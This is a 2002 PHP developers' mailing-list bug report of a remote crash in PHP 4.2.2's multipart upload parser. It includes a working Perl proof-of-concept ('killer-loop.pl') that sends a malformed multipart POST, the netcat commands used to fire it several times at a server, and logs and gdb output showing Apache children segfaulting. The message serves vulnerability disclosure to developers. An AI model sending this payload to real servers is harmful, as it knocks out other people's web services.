>---------- Forwarded message ----------
>Date: Wed, 24 Jul 2002 16:12:06 -0400 (EDT)
>From: Dan Kalowsky <[EMAIL PROTECTED]>
>To: [EMAIL PROTECTED]
>Subject: Re: Bug #18547 Updated: Remote attacker can cause SIGSEGV
>
>Please send it to [EMAIL PROTECTED]
(Okay, that's easy enough -- I posted this in the web form, but it
wrapped all to hell. Thanks for the email address, Mr. Kalowsky)
Hello. While working on an exploit for the multipart_buffer_headers() hole
that you just fixed, and I found another problem that you might want to
look into. It looks like a DoS only, but there might be a way to execute
arbitrary code and I just haven't found it yet. Credit for the find goes
to myself and members of the [0dd] 0-Day Digest.
Thanks,
Thomas Cannon
---
[root@spoon]# /usr/local/www/bin/apachectl start
/usr/local/www/bin/apachectl start: httpd started
[root@spoon]# telnet 0 80
Trying 0.0.0.0...
Connected to 0.
Escape character is '^]'.
HEAD / HTTP/1.0
HTTP/1.1 200 OK
Date: Wed, 24 Jul 2002 04:03:49 GMT
Server: Apache/1.3.26 (Unix) PHP/4.2.2
X-Powered-By: PHP/4.2.2
Connection: close
Content-Type: text/html
Connection closed by foreign host.
[root@spoon]# /usr/local/www/bin/httpd -l
Compiled-in modules:
http_core.c
mod_env.c
mod_log_config.c
mod_mime.c
mod_negotiation.c
mod_status.c
mod_include.c
mod_autoindex.c
mod_dir.c
mod_cgi.c
mod_asis.c
mod_imap.c
mod_actions.c
mod_userdir.c
mod_alias.c
mod_access.c
mod_auth.c
mod_setenvif.c
mod_php4.c
suexec: disabled; invalid wrapper /usr/local/www/bin/suexec
[root@spoon]#
/* change over to my remote machine, stereophonic */
[tcannon@stereophonic]$ ./header.pl | nc noops.org 80 & [1]
90464
[tcannon@stereophonic]$ ./header.pl | nc noops.org 80 & [2]
90466
[tcannon@stereophonic]$ ./header.pl | nc noops.org 80 & [3]
90468
[tcannon@stereophonic]$ ./header.pl | nc noops.org 80 & [4]
90470
[tcannon@stereophonic]$ ./header.pl | nc noops.org 80 &
[tcannon@stereophonic]$ more header.pl
#!/usr/bin/perl
headers();
sub headers {
print "POST /vuln/upload.php HTTP/1.0\n";
print "Referer: http://www.noops.org\n";;
print "Connection: Keep-Alive\n";
print "User-Agent: killer-loop.pl\n";
print "Host: www.noops.org\n";
print "Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg,
image/png, */*\n";
print "Accept-Encoding: gzip\n";
print "Accept-Language: en\n";
print "Accept-Charset: iso-8859-1,*,utf-8\n";
print "Content-type: multipart/form-data; boundary=xnyLAaB03X\n";
print "Content-length: 246\n\n\n\n";
print "--xnyLAaB03X\n";
print "Content-Disposition: form-data; name="."A" x 100;
}
/* then back to spoon, the webserver... The 'reviewer' script is a little
thing I whipped up to keep a note of where I last read the apache_log and
error_log from, and it also weeds out the code red and nimda background
noise -- you'd see this same output from 'tail' or a similar utility */
/* NOTE: 5 - 10 minutes need to pass to give apache time to segfault */
[root@spoon]# reviewer
noops.org - - [23/Jul/2002:21:03:49 -0700] "HEAD / HTTP/1.0" 200 0 "-" "-"
adsl-66-127-227-196.dsl.sntc01.pacbell.net - - [23/Jul/2002:21:10:15
-0700] "POST /vuln/upload.php HTTP/1.0" 200 - "http://www.noops.org";
"killer-loop.pl"
adsl-66-127-227-196.dsl.sntc01.pacbell.net - - [23/Jul/2002:21:10:38
-0700] "POST /vuln/upload.php HTTP/1.0" 200 - "http://www.noops.org";
"killer-loop.pl"
adsl-66-127-227-196.dsl.sntc01.pacbell.net - - [23/Jul/2002:21:10:38
-0700] "POST /vuln/upload.php HTTP/1.0" 200 - "http://www.noops.org";
"killer-loop.pl"
adsl-66-127-227-196.dsl.sntc01.pacbell.net - - [23/Jul/2002:21:10:39
-0700] "POST /vuln/upload.php HTTP/1.0" 200 - "http://www.noops.org";
"killer-loop.pl"
adsl-66-127-227-196.dsl.sntc01.pacbell.net - - [23/Jul/2002:21:10:39
-0700] "POST /vuln/upload.php HTTP/1.0" 200 - "http://www.noops.org";
"killer-loop.pl"
Now it's the error log...
[Tue Jul 23 21:03:40 2002] [notice] Apache/1.3.26 (Unix) PHP/4.2.2
configured -- resuming normal operations
[Tue Jul 23 21:03:40 2002] [notice] Accept mutex: flock (Default: flock)
[Tue Jul 23 21:10:15 2002] [notice] child pid 31780 exit signal
Segmentation fault (11)
[Tue Jul 23 21:10:38 2002] [notice] child pid 31781 exit signal
Segmentation fault (11)
[Tue Jul 23 21:10:39 2002] [notice] child pid 31782 exit signal
Segmentation fault (11)
[Tue Jul 23 21:10:39 2002] [notice] child pid 31779 exit signal
Segmentation fault (11)
[Tue Jul 23 21:10:40 2002] [notice] child pid 31871 exit signal
Segmentation fault (11)
[root@spoon]# gdb /usr/local/www/bin/httpd 32839
GNU gdb 4.18
Copyright 1998 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you
are welcome to change it and/or distribute copies of it under certain
conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB. Type "show warranty" for
details.
This GDB was configured as "i386-unknown-freebsd"...
/usr/local/www/conf/32839: No such file or directory.
Attaching to program: /usr/local/www/bin/httpd, process 32839
Reading symbols from /usr/lib/libpam.so.1...done.
Reading symbols from /usr/lib/libcrypt.so.2...done.
Reading symbols from /usr/lib/libm.so.2...done.
Reading symbols from /usr/lib/libc.so.4...done.
Reading symbols from /usr/libexec/ld-elf.so.1...done.
0x28265794 in read () from /usr/lib/libc.so.4
(gdb) info stack #0
0x28265794 in read () from /usr/lib/libc.so.4 #1
0x812002d in ap_read () #2
0x8121c41 in buff_read () #3
0x8121be7 in saferead_guts () #4
0x812064e in read_with_errors () #5
0x812087e in ap_bread () #6
0x81335ce in ap_get_client_block () #7
0x807a60a in sapi_apache_read_post () #8
0x8080576 in fill_buffer (self=0x823a30c) at rfc1867.c:178 #9
0x808072f in get_line (self=0x823a30c) at rfc1867.c:283 #10
0x808095d in multipart_buffer_headers (self=0x823a30c,
header=0xbfbff5c4) at rfc1867.c:374 #11
0x8080fb5 in rfc1867_post_handler (content_type_dup=0x82055cc
"multipart/form-data; boundary=xnyLAaB03X",
arg=0x821f6ac) at rfc1867.c:663 #12
0x807f581 in sapi_handle_post (arg=0x821f6ac) at SAPI.c:110 #13
0x8082339 in php_treat_data (arg=0, str=0x0, destArray=0x0) at
php_variables.c:251 #14
0x807d6df in php_hash_environment () at main.c:1149 #15
0x807ce33 in php_request_startup () at main.c:733 #16
0x8105bc2 in apache_php_module_main (r=0x8237034,
display_source_mode=0) at sapi_apache.c:67
#17 0x807b02e in send_php () #18
0x807b082 in send_parsed_php () #19
0x8122665 in ap_invoke_handler () #20
0x8137928 in process_request_internal () #21
0x8137992 in ap_process_request () #22
0x812e487 in child_main () #23
0x812e710 in make_child () #24
0x812ea94 in perform_idle_server_maintenance () #25
0x812f011 in standalone_main () #26
0x812f654 in main () #27
0x8062e01 in _start ()
(gdb) n
Single stepping until exit from function read,
which has no line number information.
Program received signal SIGTRAP, Trace/breakpoint trap.
0x28265794 in read () from /usr/lib/libc.so.4
(gdb) n
Single stepping until exit from function read,
which has no line number information.
Program received signal SIGTRAP, Trace/breakpoint trap.
0x812b9dc in alrm_handler ()
(gdb) n
Single stepping until exit from function alrm_handler,
which has no line number information.
Program received signal SIGSEGV, Segmentation fault.
0x80f6b8c in _zval_ptr_dtor (zval_ptr=0x81c433c) at
zend_execute_API.c:272 272
zend_execute_API.c: No such file or directory.
(gdb) info all-registers
eax 0x0 0
ecx 0x8 8
edx 0x1 1
ebx 0x81c433c 136069948
esp 0xbfbff6b8 0xbfbff6b8
ebp 0xbfbff6d0 0xbfbff6d0
esi 0x81c433c 136069948
edi 0x2 2
eip 0x80f6b8c 0x80f6b8c
eflags 0x10292 66194
cs 0x1f 31
ss 0x2f 47
ds 0x2f 47
es 0x2f 47
fs 0x2f 47
gs 0x2f 47
(gdb) disassemble 0x80f6b8c
Dump of assembler code for function _zval_ptr_dtor:
0x80f6b80 <_zval_ptr_dtor>: pushl %ebp
0x80f6b81 <_zval_ptr_dtor+1>: movl %esp,%ebp
0x80f6b83 <_zval_ptr_dtor+3>: subl $0x14,%esp
0x80f6b86 <_zval_ptr_dtor+6>: pushl %ebx
0x80f6b87 <_zval_ptr_dtor+7>: movl 0x8(%ebp),%ebx
0x80f6b8a <_zval_ptr_dtor+10>: movl (%ebx),%eax
0x80f6b8c <_zval_ptr_dtor+12>: decw 0xa(%eax)
0x80f6b90 <_zval_ptr_dtor+16>: movl (%ebx),%eax
0x80f6b92 <_zval_ptr_dtor+18>: movzwl 0xa(%eax),%edx
0x80f6b96 <_zval_ptr_dtor+22>: testw %dx,%dx
0x80f6b99 <_zval_ptr_dtor+25>: jne 0x80f6bbc <_zval_ptr_dtor+60>
0x80f6b9b <_zval_ptr_dtor+27>: addl $0xfffffff4,%esp
0x80f6b9e <_zval_ptr_dtor+30>: pushl %eax
0x80f6b9f <_zval_ptr_dtor+31>: call 0x80fcf88 <_zval_dtor>
0x80f6ba4 <_zval_ptr_dtor+36>: movl (%ebx),%eax
0x80f6ba6 <_zval_ptr_dtor+38>: addl $0x10,%esp
0x80f6ba9 <_zval_ptr_dtor+41>: cmpl 0x81c84d0,%eax
0x80f6baf <_zval_ptr_dtor+47>: je 0x80f6bcc <_zval_ptr_dtor+76>
0x80f6bb1 <_zval_ptr_dtor+49>: addl $0xfffffff4,%esp
0x80f6bb4 <_zval_ptr_dtor+52>: pushl %eax
0x80f6bb5 <_zval_ptr_dtor+53>: call 0x80f15d0 <_efree>
0x80f6bba <_zval_ptr_dtor+58>: jmp 0x80f6bcc <_zval_ptr_dtor+76>
0x80f6bbc <_zval_ptr_dtor+60>: cmpw $0x1,%dx
0x80f6bc0 <_zval_ptr_dtor+64>: jne 0x80f6bcc <_zval_ptr_dtor+76>
0x80f6bc2 <_zval_ptr_dtor+66>: cmpb $0x5,0x8(%eax)
0x80f6bc6 <_zval_ptr_dtor+70>: je 0x80f6bcc <_zval_ptr_dtor+76>
0x80f6bc8 <_zval_ptr_dtor+72>: movb $0x0,0x9(%eax)
0x80f6bcc <_zval_ptr_dtor+76>: movl 0xffffffe8(%ebp),%ebx
0x80f6bcf <_zval_ptr_dtor+79>: leave
0x80f6bd0 <_zval_ptr_dtor+80>: ret
End of assembler dump.
--
PHP Development Mailing List <http://www.php.net/>
To unsubscribe, visit: http://www.php.net/unsub.php
